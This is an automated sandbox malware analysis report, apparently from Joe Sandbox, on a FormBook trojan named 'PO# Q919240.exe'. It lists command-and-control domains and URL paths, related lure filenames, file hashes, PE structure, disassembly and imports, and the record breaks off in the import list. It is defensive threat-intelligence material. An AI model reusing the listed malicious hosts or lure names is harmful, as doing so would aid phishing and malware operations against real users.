172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
148.72.152.174 | www.elsupertodo.net | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
3.33.130.190 | omexai.info | United States | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1515409
Start date and time: 2024-09-22 17:33:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO# Q919240.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@8/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 47
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
11:35:29 | API Interceptor | 2711433x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.191.244.62 | PAGO $830.900.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
 | EGCS-875-S5-SMO M2A.exe | malicious | FormBook | www.lurknlarkk.xyz/cjjz/
 | PO #86637.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
 | AUG 2024 SOA.exe | malicious | FormBook | www.hermesmilano.xyz/f3mz/
 | DN.exe | malicious | FormBook | www.hermesmilano.xyz/f3mz/
 | COTIZACION 290824.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
 | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | www.hermesmilano.xyz/lmxx/
 | COTIZACION 280824.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
 | Debit note Jan-Jul 2024.exe | malicious | FormBook | www.hermesmilano.xyz/f3mz/
 | Filename.exe | malicious | DarkTortilla, FormBook | www.tekilla.wtf/gou4/
63.250.47.40 | PAGO $830.900.exe | malicious | FormBook | www.kexweb.top/3bdq/
 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.balclub.top/n6ow/
 | PO #86637.exe | malicious | FormBook | www.kexweb.top/3bdq/
 | COTIZACION 290824.exe | malicious | FormBook | www.kexweb.top/3bdq/
 | ORDER_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
 | ORDER_38746_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
172.96.191.39 | PAGO $830.900.exe | malicious | FormBook | www.bola88site.one/3qit/
 | PO2-2401-0016 (TR).exe | malicious | FormBook | www.bola88site.one/3lkx/
 | Purchase Order TE- 00011-7777.exe | malicious | FormBook | www.bola88site.one/3lkx/
 | Payment confirmation 20240911.exe | malicious | FormBook | www.bola88site.one/3lkx/
 | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | www.bola88site.one/3lkx/
 | Doc_PO6900000827.exe | malicious | FormBook | www.bola88site.one/3lkx/
 | PO_20240906011824.exe | malicious | FormBook | www.bola88site.one/3lkx/
 | doc330391202408011.exe | malicious | FormBook | www.bola88site.one/wqrm/
 | PO #86637.exe | malicious | FormBook | www.bola88site.one/3qit/
 | REQST_PRC 410240665_2024.exe | malicious | FormBook | www.bola88site.one/wqrm/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
webredir.vip.gandi.net | PO098765678.exe | malicious | FormBook | 217.70.184.50
 | PAGO $830.900.exe | malicious | FormBook | 217.70.184.50
 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 217.70.184.50
 | FATURALAR PDF.exe | malicious | FormBook | 217.70.184.50
 | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 217.70.184.50
 | Order#Qxz091124.exe | malicious | FormBook | 217.70.184.50
 | DOC092024-0431202229487.exe | malicious | FormBook | 217.70.184.50
 | PO #86637.exe | malicious | FormBook | 217.70.184.50
 | au1FjlRwFR.exe | malicious | FormBook | 217.70.184.50
 | COTIZACION 290824.exe | malicious | FormBook | 217.70.184.50
redirect.3dns.box | PAGO $830.900.exe | malicious | FormBook | 172.191.244.62
 | EGCS-875-S5-SMO M2A.exe | malicious | FormBook | 172.191.244.62
 | PO #86637.exe | malicious | FormBook | 172.191.244.62
 | AUG 2024 SOA.exe | malicious | FormBook | 172.191.244.62
 | DN.exe | malicious | FormBook | 172.191.244.62
 | COTIZACION 290824.exe | malicious | FormBook | 172.191.244.62
 | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | 172.191.244.62
 | COTIZACION 280824.exe | malicious | FormBook | 172.191.244.62
 | Debit note Jan-Jul 2024.exe | malicious | FormBook | 172.191.244.62
 | Filename.exe | malicious | DarkTortilla, FormBook | 172.191.244.62
www.elsupertodo.net | PAGO $830.900.exe | malicious | FormBook | 148.72.152.174
 | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174
 | PO #86637.exe | malicious | FormBook | 148.72.152.174
 | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174
 | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174
www.kexweb.top | PAGO $830.900.exe | malicious | FormBook | 63.250.47.40
 | PO #86637.exe | malicious | FormBook | 63.250.47.40
 | COTIZACION 290824.exe | malicious | FormBook | 63.250.47.40
 | ORDER_pdf.exe | malicious | FormBook | 63.250.47.40
 | ORDER_38746_pdf.exe | malicious | FormBook | 63.250.47.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATT-INTERNET4US | Tsunami.arm.elf | malicious | Mirai | 172.12.118.97
 | http://s--sso---uphold-cdn-auth.webflow.io/ | malicious | HTMLPhisher | 13.32.27.68
 | https://web-metmsk-chrmxtens.gitbook.io/ | malicious | HTMLPhisher | 13.32.27.107
 | fzbl2RfIlG.exe | malicious | AsyncRAT, DcRat | 172.31.139.194
 | http://is.gd/EmlK8C | malicious | Unknown | 13.32.23.8
 | 8zzBr1gT31.elf | malicious | Mirai | 12.82.79.92
 | GyFcTadTZv.elf | malicious | Mirai | 12.73.170.234
 | iZP1hJhnmz.elf | malicious | Mirai | 12.170.82.64
 | dAlxfXyNm7.elf | malicious | Mirai | 12.197.137.121
 | 05KN0c1P2J.elf | malicious | Mirai | 13.202.73.59
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PO098765678.exe | malicious | FormBook | 217.70.184.50
 | PAGO $830.900.exe | malicious | FormBook | 217.70.184.50
 | FATURALAR PDF.exe | malicious | FormBook | 217.70.184.50
 | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 217.70.184.50
 | Order#Qxz091124.exe | malicious | FormBook | 217.70.184.50
 | DOC092024-0431202229487.exe | malicious | FormBook | 217.70.184.50
 | firmware.armv4l.elf | malicious | Unknown | 217.70.184.38
 | PO #86637.exe | malicious | FormBook | 217.70.184.50
 | au1FjlRwFR.exe | malicious | FormBook | 217.70.184.50
 | COTIZACION 290824.exe | malicious | FormBook | 217.70.184.50
NAMECHEAP-NETUS | ADNOC REQUESTS & reviews.exe | malicious | FormBook | 162.0.236.169
 | https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.php | malicious | Unknown | 63.250.43.136
 | http://siddiquimehvish07.github.io/neflixclone.github.io | malicious | HTMLPhisher | 162.0.235.241
 | https://tracking.dailyhealthalliance.com/index.php/lists/ow833rolea56c/unsubscribe/fd2523medreca/yc5259nwze | malicious | Unknown | 199.188.201.195
 | LgzpILNkS2.exe | malicious | FormBook | 162.0.238.246
 | https://aaa16-fa5c2b.ingress-comporellon.ewp.live/wp-content/plugins/idpass/pages/region.php?lca | malicious | Unknown | 63.250.43.6
 | https://urlz.fr/sfvm | malicious | Unknown | 63.250.43.5
 | https://urlz.fr/sfvk | malicious | Unknown | 63.250.43.6
 | http://redirectblacklitss-e3z.pages.dev/ | malicious | HTMLPhisher | 162.213.255.57
 | https://urlz.fr/sfsK | malicious | Unknown | 63.250.43.136
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PAGO $830.900.exe | malicious | FormBook | 172.96.191.39
 | PO2-2401-0016 (TR).exe | malicious | FormBook | 172.96.191.39
 | Purchase Order TE- 00011-7777.exe | malicious | FormBook | 172.96.191.39
 | Payment confirmation 20240911.exe | malicious | FormBook | 172.96.191.39
 | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 172.96.191.39
 | Doc_PO6900000827.exe | malicious | FormBook | 172.96.191.39
 | OjKmJJm2YT.exe | malicious | Simda Stealer | 103.150.11.230
 | 5AFlyarMds.exe | malicious | Simda Stealer | 103.150.11.230
 | uB31aJH4M0.exe | malicious | Simda Stealer | 103.150.11.230
 | PO_20240906011824.exe | malicious | FormBook | 172.96.191.39
AS-30083-GO-DADDY-COM-LLCUS | PAGO $830.900.exe | malicious | FormBook | 148.72.152.174
 | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174
 | PO #86637.exe | malicious | FormBook | 148.72.152.174
 | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174
 | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174
 | LisectAVT_2403002B_136.dll | malicious | Emotet | 207.38.84.195
 | Yb6ztdvQaB.elf | malicious | Unknown | 209.126.113.133
 | http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html | malicious | HTMLPhisher | 148.72.158.229
 | msimg32.dll | malicious | Remcos | 148.72.177.212
 | Dados Do Hospede.ppam | malicious | Njrat | 148.72.177.212
              No context
              No context
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\PO# Q919240.exe
File Type: data
Category: modified
Size (bytes): 286720
Entropy (8bit): 7.995377985244079
Encrypted: true
SSDEEP: 6144:ERRRRARRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRv:ERRRRARRRRRRRRRRRRRRRRRRRRRRRRRv
MD5: 90530F170115D5606A50E7B9FF5043E4
SHA1: A20F2DDBA1832E5CA149DA89749B869FAC26CA88
SHA-256: 886B779492FA64CB8BB7A90213DD4F1615DD23952F794B9BB0242808F01012C8
SHA-512: 667DD07E041D37B60FD083968046132A94AF7B8799FDEE46E3B1AECDD783FE812CB8B1E63BA8D24229AE14B0AD717F8AFD88559A13DDE59F8F3D3E2C649C0D8B
Malicious: false
Reputation: low
              Preview:u..b.KWU1...A.....JA..dT0...9KWU1X1ZHK5WP8MJBAXULW8JO09KWU.X1ZFT.YP.D.c.Y..vl"&C.;%:V*P7h(T9>W9j $x'99.#!.}..u\7U?fF8]t8MJBAXU5V1.rP^.j5V..:/./...w*%.B...*(.#....8V.."V?mX*.BAXULW8J.u9K.T0X..b.5WP8MJBA.UNV3KD09.SU1X1ZHK5W@,MJBQXUL7<JO0yKWE1X1XHK3WP8MJBA^ULW8JO09+SU1Z1ZHK5WR8..BAHULG8JO0)KWE1X1ZHK%WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5W~L(26AXU(.<JO 9KW.5X1JHK5WP8MJBAXULW.JOP9KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1Z
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.566837307570516
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PO# Q919240.exe
File size: 1'412'827 bytes
MD5: 1cdbbc595757ea5f6e9393d622d66e10
SHA1: 23eee5c85533ade7e463f0ad52bb044292aa4b43
SHA256: 1872f51b5d3913490f3936ab41a7388212d4c10e389eb211bc448029380891ce
SHA512: 0559c792055b7f11653ac3cad6918ae47f32e8b36e660560f1300fa2aa26fe54a1d40ccef2502e886e0867cd12070c468c59d8ab563bc61be9f6afa6dfa2e8db
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaC1ht4AIT8U9gMPUuCzP8HVpuLxfIj:7JZoQrbTFZY1iaCd4AIAUdVpuxIj
TLSH: 4165F121F9D69036C2B323B19E7FF7A9963D79260326D29B23C82D315E605416B39733
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
              Instruction
              call 00007FEDCD0048ABh
              jmp 00007FEDCCFFB71Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push edi
              push esi
              mov esi, dword ptr [ebp+0Ch]
              mov ecx, dword ptr [ebp+10h]
              mov edi, dword ptr [ebp+08h]
              mov eax, ecx
              mov edx, ecx
              add eax, esi
              cmp edi, esi
              jbe 00007FEDCCFFB89Ah
              cmp edi, eax
              jc 00007FEDCCFFBA36h
              cmp ecx, 00000080h
              jc 00007FEDCCFFB8AEh
              cmp dword ptr [004A9724h], 00000000h
              je 00007FEDCCFFB8A5h
              push edi
              push esi
              and edi, 0Fh
              and esi, 0Fh
              cmp edi, esi
              pop esi
              pop edi
              jne 00007FEDCCFFB897h
              jmp 00007FEDCCFFBC72h
              test edi, 00000003h
              jne 00007FEDCCFFB8A6h
              shr ecx, 02h
              and edx, 03h
              cmp ecx, 08h
              jc 00007FEDCCFFB8BBh
              rep movsd
              jmp dword ptr [00416740h+edx*4]
              mov eax, edi
              mov edx, 00000003h
              sub ecx, 04h
              jc 00007FEDCCFFB89Eh
              and eax, 03h
              add ecx, eax
              jmp dword ptr [00416654h+eax*4]
              jmp dword ptr [00416750h+ecx*4]
              nop
              jmp dword ptr [004166D4h+ecx*4]
              nop
              inc cx
              add byte ptr [eax-4BFFBE9Ah], dl
              inc cx
              add byte ptr [ebx], ah
              ror dword ptr [edx-75F877FAh], 1
              inc esi
              add dword ptr [eax+468A0147h], ecx
              add al, cl
              jmp 00007FEDCF474097h
              add esi, 03h
              add edi, 03h
              cmp ecx, 08h
              jc 00007FEDCCFFB85Eh
              rep movsd
              jmp dword ptr [00000000h+edx*4]
              Programming Language:
              • [ C ] VS2010 SP1 build 40219
              • [C++] VS2010 SP1 build 40219
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [ASM] VS2010 SP1 build 40219
              • [RES] VS2010 SP1 build 40219
              • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, 